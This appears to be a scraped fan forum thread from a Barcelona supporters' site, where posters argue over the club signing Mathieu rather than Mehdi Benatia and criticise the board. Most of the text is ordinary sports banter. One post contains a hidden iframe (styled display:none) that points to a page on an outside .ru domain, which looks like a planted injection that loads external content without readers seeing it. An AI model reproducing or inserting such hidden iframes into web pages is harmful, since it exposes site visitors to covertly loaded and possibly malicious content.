Mehdi Benatia

Cule4life

The Culest
Cant believe some posters are defending a money laundering scheme cum transfer just to be branded as "Positive and non whiney cules". Maybe thats whats wrong with our socios. Maybe they too dont want to branded as "whiney and ungrateful" so they don't complain about the board's absurd mistakes and dont ask for their head.

Andrew M

Ya sure, as if the board did good.

It's not because they buy Neymar and Suarez that it will erase all the bad things they did.

People want them out and not only because they miss good deals in case you're not aware about it.

Yeah, Rakitic wasn't a good deal at all, right?

L

linetty

People don't only complain about that. Check the Bartomeu's thread for example.

No need to be that defensive, even Flavia wants that board out, yet you don't harrass her.
I want the board out, you don't even know how much, but I will not write several posts everyday to point their EVERY FREAKING mistake.

I mentally throw up if I read posts like 'THEY SIGNED FREAKING MATHIEU FOR 20M AND LORD MEHDI BENATIA WAS AVAILABLE FOR ONLY 10M MORE!!!!11111'

JamDav1982

Bayern isn't a big club they play in the lowly Bundesliga :pep:

Maybe those big clubs dont rate him as highly as this board if it has not been about price.

Bayern only moving for him now Martinez is injured, while earlier in summer Bayern were reported to be in for both Mathieu and Luiz.

Doesnt look like Benatia was Bayerns first choice earlier in the summer.

Bertus

So much for "no big club sign him because Roma won't sell", according to the transfer experts of Barcaforum.

Well it was that or people like me thinking Benatia had actually a price tag of 50M+.

I was wrong there, and I admit it. That makes it even bitter. I would have preferred to be right about the reason Barca didn't go for Benatia.

F

Flavia

Laporte used to do it with Sandro following suit, it only fair that Zubi and co does that to follow tradition :satorra:.

Who is Laporte? LaportA had his share of wrongdoings, but at the very least he had competent people around him... who build the best Barça ever, that was destroyed by the current board. Since the CL in 2011, Barça won only one big title, the lliga in 11-12.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

L

linetty

Maybe becouse our central defence was the MAIN position we needed to make stronger. We coulda gotten a great player like Benatia but instead we got 2 avarage players in the end of their careers.
I've just thrown up.

Hamzah

High Definition Member
we already got some centre backs. from what i've seen, mathieu will be good for us. now please stop whining.

I

instinct

Cant believe some posters are defending a money laundering scheme cum transfer just to be branded as "Positive and non whiney cules". Maybe thats whats wrong with our socios. Maybe they too dont want to branded as "whiney and ungrateful" so they don't complain about the board's absurd mistakes and dont ask for their head.

I've never said that I support the Douglas transfer.

I'd ask for the board's head because of the non-football stuff but bashing them for not signing Benatia at this early stage of the season makes no sense.

Bertus

I want the board out, you don't even know how much, but I will not write several posts everyday to point their EVERY FREAKING mistake.

I mentally throw up if I read posts like 'THEY SIGNED FREAKING MATHIEU FOR 20M AND LORD MEHDI BENATIA WAS AVAILABLE FOR ONLY 10M MORE!!!!11111'

You're generalizing too much.

Look at me, I think Mathieu was a good deal and I am a supporter of him. Yet I would want to know why Benatia was not on barca shortlist. And don't tell me he doesn't fit Barcelona because I saw him playing and he's good enough to fit anywhere if we're only talking about skills.

Home of Barca Fans